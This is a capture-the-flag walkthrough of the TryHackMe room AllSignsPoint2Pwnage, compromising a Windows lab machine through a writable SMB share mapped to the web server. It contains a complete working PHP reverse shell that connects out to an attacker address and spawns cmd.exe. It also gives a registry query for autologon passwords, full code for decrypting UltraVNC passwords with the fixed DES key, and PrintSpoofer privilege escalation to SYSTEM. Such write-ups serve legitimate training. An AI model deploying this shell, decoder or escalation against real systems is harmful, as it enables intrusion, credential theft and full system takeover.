AllSignsPoint2Pwnage

https://tryhackme.com/room/allsignspoint2pwnage

User flag

Let's start with nmap

We see there are a bunch of open ports. Let's start with port 21.

We see there's a txt file that could be interesting. Let's download it and read it.

From the contents of the file we can guess that there is a folder somewhere to which images can be uploaded. Let's check the SMB shares and see if it's there.

We have read and write permissions on the "images$" share. It looks like we can use it to upload a reverse shell.

Let's check whether an "images" folder exists on the web server on port 80. If it does, and it maps to the same directory as the share, we can upload a reverse shell over SMB and trigger it from the browser.

It exists. We tried uploading a .aspx shell, but it did not work. We can use the following PHP reverse shell instead (an upgraded version of the well-known pentestmonkey PHP reverse shell that also works on Windows):
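The shell file itself is not reproduced in these notes, so here is an added example of a Windows-capable PHP reverse shell in the same spirit (my own code, not the file the writeup used). pentestmonkey's original fails on Windows because it spawns "/bin/sh -i", calls pcntl_fork()/posix_setsid(), and drives the pipes with stream_select(), which PHP does not support on proc_open() pipes under Windows; this version spawns cmd.exe and polls non-blocking streams instead. The IP, port, and the file name shell.php are assumptions to be replaced with your own values.

```php
<?php
// Windows-capable PHP reverse shell (added example, not the writeup's file).
// Assumptions: $ip is the attacker's VPN address, $port is the listener port
// (nc -lvnp 4444). Replace both before uploading.
$ip   = '10.10.10.10';
$port = 4444;

set_time_limit(0);          // the web server must not kill the script after 30 s
ignore_user_abort(true);    // keep running even if the browser request is closed
error_reporting(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    exit("connect to $ip:$port failed: $errstr ($errno)");
}

$descriptors = array(
    0 => array('pipe', 'r'),   // child's stdin  (we write what the socket sends)
    1 => array('pipe', 'w'),   // child's stdout (forwarded to the socket)
    2 => array('pipe', 'w'),   // child's stderr (also forwarded)
);

// cmd.exe exists on every Windows build; 'powershell.exe -nop' is the alternative.
$proc = proc_open('cmd.exe', $descriptors, $pipes, 'C:\\', null);
if (!is_resource($proc)) {
    fclose($sock);
    exit('proc_open failed');
}

// Non-blocking I/O on both ends so an idle stream never stalls the other one.
foreach ($pipes as $p) {
    stream_set_blocking($p, false);
}
stream_set_blocking($sock, false);

fwrite($sock, "[+] connected, cmd.exe pid " . proc_get_status($proc)['pid'] . "\r\n");

while (true) {
    $status = proc_get_status($proc);
    if (!$status['running'] || feof($sock)) {
        break;                       // shell exited or the listener went away
    }

    $in = fread($sock, 4096);        // attacker -> cmd.exe stdin
    if ($in !== false && $in !== '') {
        fwrite($pipes[0], $in);
    }

    foreach (array($pipes[1], $pipes[2]) as $out) {   // cmd.exe -> attacker
        $data = fread($out, 4096);
        if ($data !== false && $data !== '') {
            fwrite($sock, $data);
        }
    }

    usleep(100000);                  // 100 ms poll keeps CPU use negligible
}

foreach ($pipes as $p) {
    fclose($p);
}
proc_close($proc);
fclose($sock);
```

Save it as shell.php, put it on the "images$" share with smbclient, start "nc -lvnp 4444" on the attacker's box, and request http://<target>/images/shell.php; the request hangs while the shell is alive, which is expected.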

We upload the shell through smb.

Start the nc listener and trigger the shell by requesting the uploaded file from the web server.

We are in. Let's grab that flag.

Root flag

The hint tells us that the user is automatically logged on to the computer. Autologon credentials are stored in the Winlogon registry key (DefaultUserName / DefaultPassword), so we can retrieve the password with this command:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"

Now, for the admin password, we can go to C:\Installs and take a look at the files.

Checking "install_www_and_deploy_bat" gives us the admin password.

For the VNC password we can read ultravnc.ini.

The passwd value is not stored in the clear: UltraVNC (like RealVNC and TightVNC) DES-encrypts it with a fixed, publicly known key, so we need to decode it.

We download "vncpwd.exe" and upload it to the victim machine using smbclient. (Because the key is fixed, the value could just as well be decoded offline on our own machine; only the ini file is needed.)
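What vncpwd.exe does, as an added PHP example (my own code, not vncpwd.exe or any UltraVNC source): the stored value is the password, NUL-padded to 8 bytes, encrypted with DES-ECB under the fixed key the VNC sources ship with. The sample password below is constructed for the round trip; a real passwd= line from ultravnc.ini would be pasted in its place.

```php
<?php
// Encode/decode UltraVNC "passwd=" values offline (added example, not vncpwd.exe).
// Possession of the ini file is equivalent to possession of the password,
// because every VNC flavour uses the same hard-coded DES key.

// d3des key from the VNC sources: 23,82,107,6,35,78,88,7 (0x17 52 6b 06 23 4e 58 07).
// d3des consumes key bits in reverse order per byte, so for standard DES each
// byte must be bit-reversed: 17 52 6b 06 23 4e 58 07 -> e8 4a d6 60 c4 72 1a e0.
const VNC_DES_KEY = "\xe8\x4a\xd6\x60\xc4\x72\x1a\xe0";

// Single DES lives in OpenSSL 3's "legacy" provider and is usually unavailable to
// PHP, but 3DES with K1 = K2 = K3 is identical to single DES and stays in the
// default provider, so both helpers use des-ede3 (ECB) with the key repeated.
function vnc_des(string $block8, bool $decrypt): string
{
    $fn  = $decrypt ? 'openssl_decrypt' : 'openssl_encrypt';
    $out = $fn($block8, 'des-ede3', str_repeat(VNC_DES_KEY, 3),
               OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING);   // ZERO_PADDING = no padding
    if ($out === false) {
        throw new RuntimeException('openssl error: ' . openssl_error_string());
    }
    return $out;
}

function vnc_encode_password(string $password): string
{
    // VNC keeps at most 8 bytes of the password and NUL-pads shorter ones.
    $block = str_pad(substr($password, 0, 8), 8, "\0");
    return bin2hex(vnc_des($block, false));
}

function vnc_decode_password(string $hex): string
{
    // ultravnc.ini stores 8 cipher bytes (16 hex chars), usually followed by a
    // ninth byte such as "00"; only the first 8 bytes are the ciphertext.
    $hex = substr(preg_replace('/[^0-9a-fA-F]/', '', $hex), 0, 16);
    if (strlen($hex) !== 16) {
        throw new InvalidArgumentException('expected at least 16 hex characters');
    }
    return rtrim(vnc_des(hex2bin($hex), true), "\0");
}

// Constructed sample: round-trip a password, then decode it as if read from the ini.
$sample   = 'S3cret!';
$stored   = vnc_encode_password($sample) . '00';   // mimic the ini's trailing byte
$recover  = vnc_decode_password($stored);
printf("passwd=%s  ->  %s  (%s)\n", $stored, $recover,
       $recover === $sample ? 'round trip OK' : 'MISMATCH');
```

Note the 8-byte truncation: a long VNC password offers no more than 8 characters of keyspace, and since the key is public the stored form is obfuscation, not protection, which is why this file is worth looting whenever it is readable.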

To get the admin account we tried to log in to the machine with psexec using the password we found in the file, but it didn't work. We have to try another method; let's check our privileges:

whoami /priv

We have "SeImpersonatePrivilege" enabled, so we can abuse it with PrintSpoofer (it coerces the Print Spooler service into connecting to a named pipe we control and impersonates the resulting SYSTEM token) to escalate privileges, as we already did in the room "Relevant".

Let's upload the "PrintSpoofer.exe" file with smbclient and execute it.

PrintSpoofer.exe -i -c cmd

Let's grab the flag
